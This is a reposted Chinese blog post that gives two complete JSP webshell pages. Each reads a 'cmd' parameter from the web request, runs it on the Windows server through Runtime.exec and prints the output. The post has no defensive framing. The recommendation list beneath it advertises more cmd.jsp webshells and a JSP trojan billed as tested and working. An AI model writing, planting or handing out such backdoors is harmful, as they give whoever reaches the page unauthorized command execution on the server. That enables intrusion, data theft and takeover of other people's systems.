jsp cmd

最新推荐文章于 2024-09-01 08:09:34 发布
转载 最新推荐文章于 2024-09-01 08:09:34 发布 · 1.4k 阅读 · 0
文章标签:

#cmd #jsp #string #output #null #exception

http://hi.baidu.com/forhack/blog/item/9ebaf70673b95b7e02088181.html

 

<%@ page contentType="text/html; charset=gb2312"%>
<%@ page import="java.io.*"%>
<html>
<head><title>jsp之cmd功能</title>
</head>
<body bgcolor=#000000>
<%
String strcmd="";
String strline="";
StringBuffer result=new StringBuffer("");
strcmd = request.getParameter("cmd");
   if(strcmd!=null)
try{
Process p=Runtime.getRuntime().exec("cmd /c "+strcmd);
   BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
   while((strline=br.readLine())!=null)
   {
   result.append(strline+"/r/n");  
   }    
}catch(Exception ex)
   {
   ex.printStackTrace();
   }
%>
<form name="cmd" action="" method="post">
<input type="text" name="cmd" value="<%=strcmd%>" size=50>
<input type=submit name=submit value="执行命令">
</form>
<%
if(result!=null && result.toString().trim().equals("")==false)
{
%>
<textarea name="hack" rows="20" cols="70"><%=result.toString()%></textarea>
<%
}
%>
</body>
</html>

 

(2)

 

<%@ page contentType="text/html; charset=gb2312"%>
<%@ page import="java.io.*"%>
<%
String cmd = request.getParameter("cmd");
String output = "";

if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<form method="post" action'cmdjsp.jsp'>
<input name='cmd' type=text>
<input type=submit value='Run'>
</form>
<textarea name="hack" rows="20" cols="70">
<%=output%>
</textarea>

mmllkkjj
关注
jsp/java执行或者调用bat/cmd脚本文件
青灬火的博客
06-15 4120
jsp页面调用脚本文件或者脚本命令的方法其实和java一样,因为可以在jsp中执行java代码 <%@ page language="java" import="java.lang.*" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBL...
cmd下过滤文件名称的两种方法
09-17
### CMD下过滤文件名称的两种方法 在日常的文件管理和软件开发过程中,经常需要在命令行界面(CMD)中对文件进行筛选或过滤操作。本文将详细介绍CMD环境下两种常用的文件名称过滤方法:通过管道结合`find`命令以及...
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
一段在JSP操作CMD的小代码
java开发指南博客 【转载】
10-17 351
jsp或者java里面执行CMD命令的小代码. &lt;%@ page import="java.io.*" %&gt; &lt;% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInput...
cmd编译可以通过执行没有结果_Jsp挖掘(6)-JSP命令执行漏洞
weixin_39885412的博客
11-24 210
JSP命令执行漏洞 一、代码执行成因调用Runtime但是没有对传入参数没有过滤和限制:jsp调用命令行的只需要在<%%> 中编写使用Runtime类即可调用命令行Windows 用“&”,linux用“;”号来分隔多条命令'cmd.exe /c type "E:jspWebGoat-5.3_RC1tomcatwebappswebgoatlesson_plansEnglishB...
cmd.jsp 经典版
Sunc23的专栏
12-03 2335
try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c)
jsp 文件管理器.rar_jsp_jsp 文件_jsp文件_文件管理
09-21
**JSP文件管理器** JavaServer Pages(JSP)是一种基于Java的技术,用于创建动态网页。JSP文件管理器是一个应用程序,它允许用户通过Web界面查看、上传、下载、删除和管理服务器上的文件。这样的系统在共享文件、...
简化JSP环境配置的Java CMD脚本
在Java和JSP环境变量配置的过程中,可以通过编写一个名为“java、jsp环境变量配置.cmd”的批处理文件来简化配置。文件中会包含设置JAVA_HOME、CATALINA_HOME等环境变量的命令,同时可能还会包括更新PATH和CLASSPATH...
java、jsp环境变量配置.cmd
12-23
本文将详细解释如何配置这些环境变量,并介绍提供的"java、jsp环境变量配置.cmd"脚本的作用。 首先,我们来了解环境变量的重要性。环境变量在操作系统中存储了关于软件运行所需路径和设置的信息。对于Java和JSP,...
cmd jsp 交互
mmllkkjj的专栏
01-14 4172
<%@page pageEncoding="gbk"%><br /> <%@page import="java.io.*"%><br /> <%!<br /> /**<br /> * Codz By ninty<br /> * http://www.forjj.com/<br /> * 2010-01-23<br /> * Windows + Tomcat 5.5 + Jdk6 + Editplus<br /> * 提供与cmd.exe的在线交互功能,只支持单个用户用,不要双开这
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
jsp命令行页面
01-16
放在同一目录下,需要导入jquery,jquery版本最低1.7
JSP大马文件
08-13
jsp 木马, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途
Java程序执行CMD命令代码实现
06-16
Java程序是如何执行CMD命令的,就是需要RunTime、Process类而已。 具体代码在文档中
cmd.jsp 项目使用教程
最新发布
gitblog_00967的博客
09-01 452
cmd.jsp 项目使用教程 1. 项目的目录结构及介绍 cmd.jsp 项目的目录结构如下: cmd.jsp/ ├── README.md ├── cmd.jsp └── web.xml README.md: 项目说明文件,包含项目的基本介绍和使用方法。 cmd.jsp: 项目的核心文件,用于执行远程命令。 web.xml: 项目的配置文件,定义了 servlet 和 servlet-map...
JSP执行DOS命令
zoeque的专栏
06-15 534
Insert title here
掌控命令行的利器:更好的cmd.jsp Webshell
gitblog_00065的博客
05-25 493
掌控命令行的利器:更好的cmd.jsp Webshell 项目介绍 在网络安全和渗透测试领域,cmd.jsp是一个小巧而强大的Java Webshell,它专注于提供远程命令执行以及文件上传功能。这个开源项目的目标是实现最小化、兼容广泛的Webshell,通过内嵌的JavaScript实现界面交互和客户端逻辑,简化了传统Webshell的部署和使用。 项目技术分析 cmd.jsp的核心在于它的轻量...
【学习笔记】javaweb Response
Noob小叮当的博客
09-19 115
Response简介 在Servlet API中,定义了一个HttpServletResponse接口,它继承自ServletResponse接口,专门用来封装HTTP响应消息。由于,因此,在HttpServletResponse接口中定义了向客户端发送响应状态码、响应消息头、响应消息体的方法 以setXxx()方法为主 设置响应行 响应行构成: 常用状态码: 设置方法: setStatus(int status)方法 200 302 304 sendError(int sc)方法
JS 和 JAVA 执行cmd命令
u010730870的博客
11-27 1026
JS 建一个html文件,写个例子: <html> <head> <meta charset = "UTF-8"> </head> <body> Input Command :<input id = "cmdValue"/></br> <button onclick = "jsExec...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值